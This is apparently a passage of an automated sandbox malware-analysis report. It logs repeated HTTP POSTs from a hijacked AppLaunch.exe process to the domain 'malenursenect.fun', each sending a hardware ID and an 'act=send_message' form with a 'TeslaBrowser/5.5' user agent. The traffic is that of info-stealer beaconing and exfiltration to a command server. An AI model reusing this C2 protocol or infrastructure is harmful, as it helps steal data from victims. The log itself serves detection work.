                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        80192.168.2.349901104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:09.592667103 CEST5535OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:03:09.593156099 CEST5535OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:10.007989883 CEST5725OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:10.360265970 CEST5727INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:10 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=n7sco9ct0nslq9b12ivote44ru; expires=Sat, 27 Jan 2024 09:49:49 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:10 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GU9kzf1kd9ir0O62SGb%2BSvjKWyrk28xYd369MKAu6fsyz%2BpvL0DZzetsULyY5L1CY2YxxiV1MKQm6XehrNd3ZzA6QLWhkIOy%2FmQj8cnoompo9CnPz9uCuEQO7SojDAHqzNeD4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669e13e583964-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:10.360322952 CEST5727INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        81192.168.2.349902104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:10.584400892 CEST5735OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:03:10.584840059 CEST5735OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:10.954288960 CEST5792INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:10 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=r0snvbifhf2diihcq8l9br7l4l; expires=Sat, 27 Jan 2024 09:49:49 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:10 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YSl6sDV7SMLDbUylgGSHST77lL8rMAcDZx7u5%2Bif%2F4BHmuu9oX%2Bv769Y8gkXMCgLZZQLIobfeBbHeQNaxhhDc30sgXErl7ieZyTWXVsvLL5%2BOqFCMw7timuqqQ%2FBgusHGrS6sg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669e75e401ffe-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:10.954344034 CEST5792INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        82192.168.2.349903104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:11.168302059 CEST5799OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:03:11.168772936 CEST5799OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:11.557065010 CEST5800INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:11 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=6tkpv69go2sidmi23q3u5kr24i; expires=Sat, 27 Jan 2024 09:49:50 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:11 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=r8PKFPFA3OULCV7XPkE0SizUgKBuPAedErx4MclMgMZxpgmArICjQrFgUMtTBN8EK%2FQuEH%2FioNO2Lu9LfIK3sJ1DEgrzqPAc7U08dCakk%2Fc7zZq1yaMjFw4eAutOmx543sgZ1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669eb0a76391a-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:11.557123899 CEST5801INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        83192.168.2.349904104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:14.742511034 CEST5803OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:03:14.743072987 CEST5803OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:15.085762024 CEST5804INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:15 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=346mmpaft15o0u46gukqmuojv3; expires=Sat, 27 Jan 2024 09:49:53 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:14 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FVbqbWE%2FZitYuSFy3YnAY2eCDeTndbk64D4%2FsN16UUngE5rWT%2B4W6QHDgDKpKZFG%2BbftAlnAIOM2kKL2kEhIkGj6wdjokmBNspYC6uCPlHH7LqvwlKuglVefVzks2Vsidih%2BHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 81066a015d2405ef-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:15.085824013 CEST5805INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        84192.168.2.349905172.67.151.21980C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:15.328561068 CEST5805OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:03:15.329075098 CEST5806OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:15.677778959 CEST5808INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:15 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=9id7gemefoj6pj8o4ok9obn635; expires=Sat, 27 Jan 2024 09:49:54 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:15 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ga3W5NMQ937zv8nLdwe%2B31LZ2VN3TXqGeR%2F36nK2bdSBeRc3dL6DQEzp8g4OTAVHwXNG1yvQwzbUDz%2FrtmCHNqANx8lhWuY9cYS7ik0HcWeT3c9FKOORQ5RXByaUwGGNISRnkw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 81066a050cd881c1-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:15.677856922 CEST5808INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        85192.168.2.349907104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:15.904870033 CEST5814OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:03:15.905281067 CEST5815OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:16.256583929 CEST5816INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:16 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=hs7b13mjf4embob3ub2ucmrl7n; expires=Sat, 27 Jan 2024 09:49:55 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:16 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tQ51CVH5nWbSRocE62GgY2nvDne0PUFmclOSKUTfHNtLHI9N8j0rVFUgW5shIu%2FXeh8vlzznu5VjEs5DuG78HMxqFGDdNYNFnS7%2B%2Fy%2Fj2De3afYxfEFI5Wb6cgij6hwZnnw9GA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 81066a089d1e9c73-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:16.256649017 CEST5816INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        86192.168.2.349908172.67.151.21980C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:16.474483967 CEST5817OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:03:16.475060940 CEST5818OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:16.803668022 CEST5819INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:16 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=dmlqe2cqnsnb2ung41fhvpq8eh; expires=Sat, 27 Jan 2024 09:49:55 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:16 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uuJdA4S9pmmtk6wJTKiBysBwahSfuGhYNtj8gs%2FH%2F2AaN6qFcSzt9NWZxHaNqEOZCEnaHNGo%2BXy7ypdLYowze7b2ywO9392SFVGXt%2FUt85RZYJxS82q73UaByw00PMzi9GWLpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 81066a0c2cd88269-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:16.803693056 CEST5819INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        87192.168.2.349909104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:17.025876999 CEST5820OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:03:17.026285887 CEST5820OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:03:17.358841896 CEST5822INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:03:17 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=5kmu4oian89slndsak6rp0fkci; expires=Sat, 27 Jan 2024 09:49:56 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:03:17 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jriKhIk24dzV0JZDQcHQgSCQ%2BlQhRI87r9MzAZRtJ2Iufn4zBbOFBQRgrTlKRIGc%2B9yYHHLnAt9WSby630v1j67Jgr3jzvMSvqgkOVhy9T8hMnqCv8RvGr3EX33a8ZH7pWYmtw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 81066a0fada28275-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:03:17.358865976 CEST5822INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        88192.168.2.349910104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:03:17.584311008 CEST5822OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:03:17.584784985 CEST5823OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
